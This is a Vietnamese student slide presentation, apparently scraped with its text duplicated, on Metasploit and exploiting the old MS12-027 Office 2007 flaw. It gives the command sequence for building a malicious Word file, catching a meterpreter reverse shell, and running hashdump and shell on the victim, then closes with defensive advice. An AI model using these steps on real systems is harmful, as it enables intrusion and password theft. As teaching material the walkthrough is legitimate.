Đề tài: System Hacking
Sinh viên:
Trần Văn Vịnh
Nguyễn Minh Tiến
GVHDTT : Võ Đỗ Thắng
Nội dung
• 1. Giới thiệu về System Hacking, Metasploit và cách sử
dụng Metasploit Framework.
• 2. Khai thác lỗi Microsoft Office 2007, mã lỗi ms12_027.
• 3. Khai thác lỗi Adobe Reader 9 trên WinXP.
(Demo video)
• 4. Tấn công WinXP sử dụng lỗi Internet Explorer, mã lỗi
ms12_004.
(Demo code)
• 5. Các phương pháp bảo mật, phòng tránh System
Hacking.
I. Giới thiệu System Hacking,
metasploit framework
1. Giới thiệu system hacking
System hacking bao gồm những kỹ thuật lấy username, password dựa
vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của
hệ điều hành. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa
những log file hệ thống.
2. Giới thiệu về MSF(metasploit framework)
MSF là một framework mã nguồn mở, được phát triển với mục đích
cung cấp các thông tin về các lỗ hổng bảo mật, hỗ trợ để thử nghiệm các xâm
nhập hệ thống (penetration testing: pen-testing ). Ban đầu MSF được viết bằng
ngôn ngữ Perl, nhưng từ phiên bản 3.0 trở đi MSF được viết lại toàn bộ bằng
Ruby, và được bổ sung thêm các công cụ khác trong nghiên cứu bảo mật như các
công cụ thu thập thông tin, fuzzing, scanner ..
II. Sử dụng Metasploit Framework
1) Chọn module exploit
Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác
- show exploits: xem các module exploit mà framework có hỗ trợ
- use exploit_name: chọn module exploit
- info exploit_name: xem thông tin về module exploit
2) Cấu hình module exploit đã chọn
- show options: Xác định những options nào cần cấu hình
- set : cấu hình cho những option của module đó
Một vài module còn có những advanced options, chúng ta có thể xem bằng
cách gõ dòng lệnh show advanceds
3) Verify những options vừa cấu hình
- check: kiểm tra xem những option đã được set chính xác chưa.
4) Lựa chọn payload
Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một
phần của virus máy tính để thực thi mã độc.
- show payloads: liệt kê ra những payload của module exploit hiện tại
- info payload_name: xem thông tin chi tiết về payload đó
- set payload payload_name: xác định payload module name.Sau khi
lựa chọn payload nào, dùng lệnh show options để xem những options
của payload đó
- show advanced: xem những advanced options của payload đó
5) Thực thi exploit
- exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung
cấp cho chúng ta những thông tin về hệ thống được khai thác
II. Sử dụng Metasploit Framework
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- Vào Terminal, gõ msfconsole và Enter:
Để dùng mã lỗi ms12-027: search ms12-027 và enter
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Ta gõ tiếp:
use exploit/windows/fileformat/ms12_027_mscomctl_bof và enter
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- set PAYLOAD windows/meterpreter/reverse_tcp
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Dùng lệnh: show options để xem các tham số cần thiết để có thể tiến
hành tấn công được:
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Set filename : tên file word chứa mã đôc.
Set lhost: IP của máy tấn công.
Exploit : thực thi.
Copy file word chứa mã độc vào /var/www để máy victeam có thể
download về.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
/ect/init.d/apache2 start : khởi động máy chủ ảo.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- use exploit/multi/handler
- Set lại lhost và payload.
- exploit để bắt đầu khởi động server.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- Tại máy victeam ta truy cập vào địa chỉ của máy tấn công để
downlad file word chứa mã độc về.
- Sau đó mở file word đó lên.
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Đợi một lát, trên máy tính tấn công ta được:
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
- Để tương tác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của
sessions)
- Bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều
khiển được máy nạn nhân với toàn quyền. Ví dụ:
- Lệnh sysinfo để lấy thông tin của máy nạn nhân:
- Lệnh hashdump để lấy mật khẩu của người dùng dưới dạng hash
- Chúng ta có thể xem tất cả các lệnh hỗ trợ bằng lênh: help
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
Lệnh rất hữu ích để sử dụng cmd (command-line): shell
III. Khai thác lỗi Microsoft
Office 2007, ms12_027
IV. Khai thác lỗi Adobe Reader
Video demo:
https://www.youtube.com/watch?v=xRgq7cZgCwo&feature=youtu.be
V. Khai thác lỗi Internet Explorer,
ms12_004
Demo code
VI. Các phương pháp bảo mật,
phòng tránh System Hacking.
• Cài đặt phần mềm diệt virut Internet Security.
• Thường xuyên cập nhật các bản vá lỗi của Microsofts,
Windows để tránh bị hacker lợi dụng.
• Luôn sử dụng các bản Office có bản quyền để luôn được
cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp.
• Không nên mở các file Word, PDF, Link liên kết lạ… từ
email không rõ nguồn gốc.
CÁM ƠN THẦY
VÀ CÁC BẠN ĐÃ LẮNG NGHE

Bao cao

  • 1.
    Đề tài: SystemHacking Sinh viên: Trần Văn Vịnh Nguyễn Minh Tiến GVHDTT : Võ Đỗ Thắng
  • 2.
    Nội dung • 1.Giới thiệu về System Hacking, Metasploit và cách sử dụng Metasploit Framework. • 2. Khai thác lỗi Microsoft Office 2007, mã lỗi ms12_027. • 3. Khai thác lỗi Adobe Reader 9 trên WinXP. (Demo video) • 4. Tấn công WinXP sử dụng lỗi Internet Explorer, mã lỗi ms12_004. (Demo code) • 5. Các phương pháp bảo mật, phòng tránh System Hacking.
  • 3.
    I. Giới thiệuSystem Hacking, metasploit framework 1. Giới thiệu system hacking System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống. 2. Giới thiệu về MSF(metasploit framework) MSF là một framework mã nguồn mở, được phát triển với mục đích cung cấp các thông tin về các lỗ hổng bảo mật, hỗ trợ để thử nghiệm các xâm nhập hệ thống (penetration testing: pen-testing ). Ban đầu MSF được viết bằng ngôn ngữ Perl, nhưng từ phiên bản 3.0 trở đi MSF được viết lại toàn bộ bằng Ruby, và được bổ sung thêm các công cụ khác trong nghiên cứu bảo mật như các công cụ thu thập thông tin, fuzzing, scanner ..
  • 4.
    II. Sử dụngMetasploit Framework 1) Chọn module exploit Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác - show exploits: xem các module exploit mà framework có hỗ trợ - use exploit_name: chọn module exploit - info exploit_name: xem thông tin về module exploit 2) Cấu hình module exploit đã chọn - show options: Xác định những options nào cần cấu hình - set : cấu hình cho những option của module đó Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds 3) Verify những options vừa cấu hình - check: kiểm tra xem những option đã được set chính xác chưa.
  • 5.
    4) Lựa chọnpayload Payload là đoạn code mà sẽ chạy trên hệ thống remote machine, là một phần của virus máy tính để thực thi mã độc. - show payloads: liệt kê ra những payload của module exploit hiện tại - info payload_name: xem thông tin chi tiết về payload đó - set payload payload_name: xác định payload module name.Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó - show advanced: xem những advanced options của payload đó 5) Thực thi exploit - exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác II. Sử dụng Metasploit Framework
  • 6.
    III. Khai tháclỗi Microsoft Office 2007, ms12_027 - Vào Terminal, gõ msfconsole và Enter:
  • 7.
    Để dùng mãlỗi ms12-027: search ms12-027 và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 8.
    Ta gõ tiếp: useexploit/windows/fileformat/ms12_027_mscomctl_bof và enter III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 9.
    - set PAYLOADwindows/meterpreter/reverse_tcp III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 10.
    Dùng lệnh: showoptions để xem các tham số cần thiết để có thể tiến hành tấn công được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 11.
    III. Khai tháclỗi Microsoft Office 2007, ms12_027 Set filename : tên file word chứa mã đôc. Set lhost: IP của máy tấn công. Exploit : thực thi.
  • 12.
    Copy file wordchứa mã độc vào /var/www để máy victeam có thể download về. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 13.
    /ect/init.d/apache2 start :khởi động máy chủ ảo. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 14.
    - use exploit/multi/handler -Set lại lhost và payload. - exploit để bắt đầu khởi động server. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 15.
    - Tại máyvicteam ta truy cập vào địa chỉ của máy tấn công để downlad file word chứa mã độc về. - Sau đó mở file word đó lên. III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 16.
    Đợi một lát,trên máy tính tấn công ta được: III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 17.
    - Để tươngtác với 1 session nào đó ta thực hiện: sessions –i 1 (1 là id của sessions) - Bây giờ thì mọi việc đã trở nên dễ dàng hơn, khi kẻ tấn công đã điều khiển được máy nạn nhân với toàn quyền. Ví dụ: - Lệnh sysinfo để lấy thông tin của máy nạn nhân: - Lệnh hashdump để lấy mật khẩu của người dùng dưới dạng hash - Chúng ta có thể xem tất cả các lệnh hỗ trợ bằng lênh: help III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 18.
    Lệnh rất hữuích để sử dụng cmd (command-line): shell III. Khai thác lỗi Microsoft Office 2007, ms12_027
  • 19.
    IV. Khai tháclỗi Adobe Reader Video demo: https://www.youtube.com/watch?v=xRgq7cZgCwo&feature=youtu.be
  • 20.
    V. Khai tháclỗi Internet Explorer, ms12_004 Demo code
  • 21.
    VI. Các phươngpháp bảo mật, phòng tránh System Hacking. • Cài đặt phần mềm diệt virut Internet Security. • Thường xuyên cập nhật các bản vá lỗi của Microsofts, Windows để tránh bị hacker lợi dụng. • Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. • Không nên mở các file Word, PDF, Link liên kết lạ… từ email không rõ nguồn gốc.
  • 22.
    CÁM ƠN THẦY VÀCÁC BẠN ĐÃ LẮNG NGHE